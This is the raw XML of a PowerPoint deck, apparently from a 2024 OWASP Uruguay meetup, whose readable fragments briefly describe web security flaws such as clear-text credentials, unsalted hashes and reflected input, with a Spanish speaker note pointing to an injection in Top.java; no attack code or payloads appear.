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7"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="389" r:id="rId3"/>
    <p:sldId id="390" r:id="rId4"/>
    <p:sldId id="375" r:id="rId5"/>
    <p:sldId id="376" r:id="rId6"/>
    <p:sldId id="259" r:id="rId7"/>
    <p:sldId id="260" r:id="rId8"/>
    <p:sldId id="415" r:id="rId9"/>
    <p:sldId id="263" r:id="rId10"/>
    <p:sldId id="264" r:id="rId11"/>
    <p:sldId id="416" r:id="rId12"/>
    <p:sldId id="268" r:id="rId13"/>
    <p:sldId id="417" r:id="rId14"/>
    <p:sldId id="269" r:id="rId15"/>
    <p:sldId id="418" r:id="rId16"/>
    <p:sldId id="377" r:id="rId17"/>
    <p:sldId id="419" r:id="rId18"/>
    <p:sldId id="378" r:id="rId19"/>
    <p:sldId id="420" r:id="rId20"/>
    <p:sldId id="421" r:id="rId21"/>
    <p:sldId id="380" r:id="rId22"/>
    <p:sldId id="422" r:id="rId23"/>
    <p:sldId id="423" r:id="rId24"/>
    <p:sldId id="396" r:id="rId25"/>
    <p:sldId id="257" r:id="rId26"/>
    <p:sldId id="258" r:id="rId27"/>
    <p:sldId id="425" r:id="rId28"/>
    <p:sldId id="276" r:id="rId29"/>
    <p:sldId id="427" r:id="rId30"/>
    <p:sldId id="428" r:id="rId31"/>
    <p:sldId id="429" r:id="rId32"/>
    <p:sldId id="304" r:id="rId33"/>
    <p:sldId id="308" r:id="rId34"/>
    <p:sldId id="307" r:id="rId35"/>
    <p:sldId id="311" r:id="rId36"/>
    <p:sldId id="430" r:id="rId37"/>
    <p:sldId id="310" r:id="rId38"/>
    <p:sldId id="323" r:id="rId39"/>
    <p:sldId id="271" r:id="rId40"/>
    <p:sldId id="314" r:id="rId41"/>
    <p:sldId id="315" r:id="rId42"/>
    <p:sldId id="426" r:id="rId43"/>
    <p:sldId id="318" r:id="rId44"/>
    <p:sldId id="345" r:id="rId45"/>
    <p:sldId id="397" r:id="rId46"/>
    <p:sldId id="398" r:id="rId47"/>
    <p:sldId id="431" r:id="rId48"/>
    <p:sldId id="432" r:id="rId49"/>
    <p:sldId id="433" r:id="rId50"/>
    <p:sldId id="434" r:id="rId51"/>
    <p:sldId id="435" r:id="rId52"/>
    <p:sldId id="436" r:id="rId53"/>
    <p:sldId id="437" r:id="rId54"/>
    <p:sldId id="438" r:id="rId55"/>
    <p:sldId id="439" r:id="rId56"/>
    <p:sldId id="440" r:id="rId57"/>
    <p:sldId id="441" r:id="rId58"/>
    <p:sldId id="442" r:id="rId59"/>
    <p:sldId id="443" r:id="rId60"/>
    <p:sldId id="444" r:id="rId61"/>
    <p:sldId id="445" r:id="rId62"/>
    <p:sldId id="399" r:id="rId63"/>
    <p:sldId id="341" r:id="rId64"/>
    <p:sldId id="400" r:id="rId65"/>
    <p:sldId id="343" r:id="rId66"/>
    <p:sldId id="401" r:id="rId67"/>
    <p:sldId id="346" r:id="rId68"/>
    <p:sldId id="402" r:id="rId69"/>
    <p:sldId id="348" r:id="rId70"/>
    <p:sldId id="403" r:id="rId71"/>
    <p:sldId id="404" r:id="rId72"/>
    <p:sldId id="351" r:id="rId73"/>
    <p:sldId id="352" r:id="rId74"/>
    <p:sldId id="357" r:id="rId75"/>
    <p:sldId id="359" r:id="rId76"/>
    <p:sldId id="405" r:id="rId77"/>
    <p:sldId id="353" r:id="rId78"/>
    <p:sldId id="406" r:id="rId79"/>
    <p:sldId id="360" r:id="rId80"/>
    <p:sldId id="407" r:id="rId81"/>
    <p:sldId id="362" r:id="rId82"/>
    <p:sldId id="408" r:id="rId83"/>
    <p:sldId id="364" r:id="rId84"/>
    <p:sldId id="409" r:id="rId85"/>
    <p:sldId id="410" r:id="rId86"/>
    <p:sldId id="366" r:id="rId87"/>
    <p:sldId id="411" r:id="rId88"/>
    <p:sldId id="368" r:id="rId89"/>
    <p:sldId id="412" r:id="rId90"/>
    <p:sldId id="413" r:id="rId91"/>
    <p:sldId id="393" r:id="rId92"/>
    <p:sldId id="394" r:id="rId93"/>
    <p:sldId id="395" r:id="rId94"/>
    <p:sldId id="392" r:id="rId95"/>
    <p:sldId id="322" r:id="rId96"/>
  </p:sldIdLst>
  <p:sldSz cx="12192000" cy="6858000"/>
  <p:notesSz cx="6807200" cy="9939338"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
      <p:regular r:id="rId98"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
      <p:regular r:id="rId99"/>
      <p:bold r:id="rId100"/>
      <p:italic r:id="rId101"/>
      <p:boldItalic r:id="rId102"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
      <p:regular r:id="rId103"/>
      <p:bold r:id="rId104"/>
      <p:italic r:id="rId105"/>
      <p:boldItalic r:id="rId106"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Helvetica Neue" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId107"/>
      <p:bold r:id="rId108"/>
      <p:italic r:id="rId109"/>
      <p:boldItalic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1" roundtripDataSignature="AMtx7mieYdYDLKrHRAKpllZYFDKoi0it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804" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="74" d="100"/>
          <a:sy n="74" d="100"/>
        </p:scale>
        <p:origin x="1013" y="43"/>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font" Target="fonts/font1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6.fntdata"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font1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9.fntdata"/><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3.fntdata"/><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9787" cy="49869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5838" y="0"/>
            <a:ext cx="2949787" cy="498693"/>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0720" y="4783307"/>
            <a:ext cx="5445760" cy="3913614"/>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40647"/>
            <a:ext cx="2949787" cy="498692"/>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5838" y="9440647"/>
            <a:ext cx="2949787" cy="49869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1:notes"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="680720" y="4783307"/>
            <a:ext cx="5445760" cy="391361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1:notes"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3855838" y="9440647"/>
            <a:ext cx="2949787" cy="49869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0573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55450-894B-6077-C9CD-4BC32A84E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667ED2-79BD-5DE5-50FA-261C2274F7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D807CB-13D5-226C-D724-90DE60B6B6AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="es-UY" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05DFB019-0C9F-724F-598A-C3FDCBB1CAF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5531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4195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8EBB2-9D84-1F9A-2EE3-27CCFAE6E7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F724E-04B9-6C13-D200-8F0AD3F5C6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A2C95-54E2-7365-841D-7FE8212EB1AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="es-UY" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A240BDD5-7371-3EE2-8540-B890452D7B81}"/>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260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824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54647-17B6-819D-F974-CF5AEFA9AD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B5DDD-61CC-AEB1-F8C3-EB3509A1AB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296C0B-3DFB-B509-E1D5-030503606FF2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="es-UY" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA56B406-E0F1-B1DE-7626-9BDEC7287A1B}"/>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12820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F1E44-69B4-198D-E72B-A2B25DBC72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A510D9-1DE7-968A-65A3-2118E1D9CE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9F9C8D-7A19-3113-6AAF-356A4CE2C4D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="es-UY" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7FBD624-4007-D707-9115-CD5909121614}"/>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7609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9047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95527-4FC9-5CF3-3D90-C414AF9562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899084-C9F3-D4D7-7681-05962BA5F3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5CD503-8A5F-2F68-D45D-CAAF532BCAED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="es-UY" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8007F1E8-C949-E463-F870-2617B9C1335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7910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D0686-E904-1D67-21A3-F5F6D7F1E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6B63D2-627A-8596-CE61-E75996D29F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FDAF66-3FA0-04AF-1DF3-E2C0F8CD5699}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="es-UY" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81A01FED-EEC3-5E1D-60E6-E2C8AA0FCA5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0623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9694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2958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8140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EE6E4-3EA1-7C61-2F58-1502CEB4CD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1A2FF7-FF7F-3599-2FA4-9DFF69925E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FA8BD0-EBCD-45CE-2848-BE779F3C4B97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" dirty="0"/>
              <a:t>Top.java posee la inyección</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62C2189D-CC7B-2401-DAAF-8684289C0C01}"/>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1334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91262-288D-13F6-7D00-120DC4B1D9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737C8-417F-60C5-6CA5-7901D98022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B5A1D-E5FA-BE51-842E-02735FD6BF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3EC9FF-F3CC-2597-361F-53B03BEAA58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1100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C0207-F798-0928-9FCB-8F03E93C09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AC7F10-0679-5208-C3EC-E5C74F32D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41E811-C6F5-7FEF-D3FF-E5C44809FF69}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" dirty="0"/>
              <a:t>Top.java posee la inyección</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{923338D9-473B-EB33-C1D2-C8C24859961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0405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noProof="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9503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779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63154-E310-E5CB-AC63-D50552A306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319330-E5CD-2DE1-FDDE-5D5891334E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EA88BF-62E6-D2A1-FAD8-C5D61AADE2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5FBAAF-EB1A-F759-0A76-DE411E20A24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752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7930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9902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7579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D5DCC-9073-2550-CA00-F53E3AB83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2263A2-7EEB-E084-763D-8759BE123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9693B6-B43A-08E4-CFB8-C13DD4DE48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CA711B-6E3A-FA8A-81A0-5C2E097339F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689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Y" dirty="0"/>
              <a:t>Top.java posee la inyección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4958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9366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Y" dirty="0"/>
              <a:t>Top.java posee la inyección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8593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7187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A0F8B-B952-1540-F6FE-6816635256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9143A9-C6A2-D00A-9485-D43ED3B74F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0328F-7C00-243B-A7A7-C70F1871A7EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="es-UY" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A10CF25-BDB8-EE1D-497F-C4575C50CCF4}"/>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73649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D7973-A017-09C7-9638-E5F66689FE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8A1D80-07EA-5DAA-9973-1BDE8C4C4E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6DFA19-B181-6900-C15A-36DCFC7CC706}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="es-UY" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41F66AD9-727E-A9B8-2D27-C282E311757B}"/>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09809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CCE8C-36CC-271F-604F-198B634C8A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1D1852-FA2D-0B24-F8C1-44C3F9D828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C9D58-77F8-1200-8A9F-6F343D108AAB}"/>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s-UY" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BAF933DD-F0E8-082B-44FB-97C3A6E414ED}"/>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34496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61456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3931D-BF0D-8C26-A756-760ACB7A1B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417BCA-CB99-A2D2-2CEC-9E54C3CF52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8CEDB-44A2-24AA-810C-32E0D04BDB36}"/>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s-UY" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53CE5E74-42D6-6390-3A20-5E2C1AB7080E}"/>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50892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33550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F4CB7-2484-53AD-6CE0-F72C83EB4F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C8E75D-5DC0-4F73-9376-F3BB3D5F5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8E74A0-B751-2556-F6EE-7AD775540E90}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="es-UY" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE3B50ED-CDDB-699B-1909-260252EFBEA0}"/>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45738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61779-1E7F-699F-2F9C-813DA0F8F1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64D8CF-EFCF-7D03-8CF5-4D25A09ECD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1DAA89-67C7-8E91-91AB-E0D2BDCE5337}"/>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s-UY" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{641B4702-313A-23DF-9700-2128A055AEB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30024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589D5-FFD6-3224-5286-B2F05CB785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685DDD-823D-A59A-5216-E31AA60C7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F7CB73-25A7-21EA-0066-A63C040068B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="es-UY" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A36480B6-8ABD-830C-CAEB-BF738754C2DE}"/>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56648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E5C2C-A2B8-7641-A4E3-A89097C41A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31D382-58DA-9872-7600-19639749D7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088B57-1CF8-EDDC-273C-88F8C9D36C77}"/>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s-UY" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{849776A7-DEDF-37D5-2AB8-D137E616A8FD}"/>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88222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91355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41353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9248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s-U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46714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7276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User and password transmitted in clear text via query parameters</a:t>
            </a:r>
            <a:endParaRPr lang="es-U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6868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200" dirty="0"/>
              <a:t>If password hashes are not salted attackers can still reverse the password.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-U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81819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3970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 details and credit card number saved in the clear to S3 bucket)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37192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83377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986089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sz="3200" noProof="0"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286701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3882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7411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866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input is written into the page as is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94712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0735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96901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written into a dangerous HTML attribute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950945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8465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19919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9966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is being reflected between the &lt;script&gt; tags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43214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86380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8058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44690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81793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43:notes"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="680720" y="4783307"/>
            <a:ext cx="5445760" cy="3913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759" name="Google Shape;759;p43:notes"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="422275" y="1243013"/>
            <a:ext cx="5962650"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3DC40-DB8D-5F0C-953B-B8155FABF3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3AC871-C2BC-DE10-0AB3-7BA080AB64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573271-622F-3A01-AD53-0E1F70AAA640}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="es-UY" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A26E951C-5F63-9803-56BD-2AE56A7734A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80900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832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DD681-212E-8484-D732-622B5A4BE9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D601D-5BE8-F9B5-9477-C4EEA839D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8B214A-8715-E31A-770D-C6F58E291229}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="es-UY" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA40C336-A4A0-CEA8-F049-0A7E5A6C560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89370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userDrawn="1">
  <p:cSld name="Cover">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 15"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Google Shape;25;p47">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B4F571A-B6A4-E530-9B61-9ABA8DABC1D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5448" y="6177677"/>
            <a:ext cx="12197448" cy="666739"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0038A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6;p47">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F4355F8-660A-D164-9843-B5B7E4DA7566}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1771842" y="4374819"/>
            <a:ext cx="284329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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>owasp.org/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>uruguay</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Google Shape;77;p54">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF098FFC-DE46-4F2B-399C-595C49D7EEA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="216038"/>
            <a:ext cx="10515600" cy="563267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es-UY" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="La Meetup 2024 | OWU Uruguay">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{577FD7AD-31D6-8307-A187-9ACA833D239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891" y="216038"/>
            <a:ext cx="5961638" cy="59616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er">
  <p:cSld name="Header">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 23"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24" name="Google Shape;24;p47"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="123217" y="129239"/>
            <a:ext cx="1747147" cy="983795"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
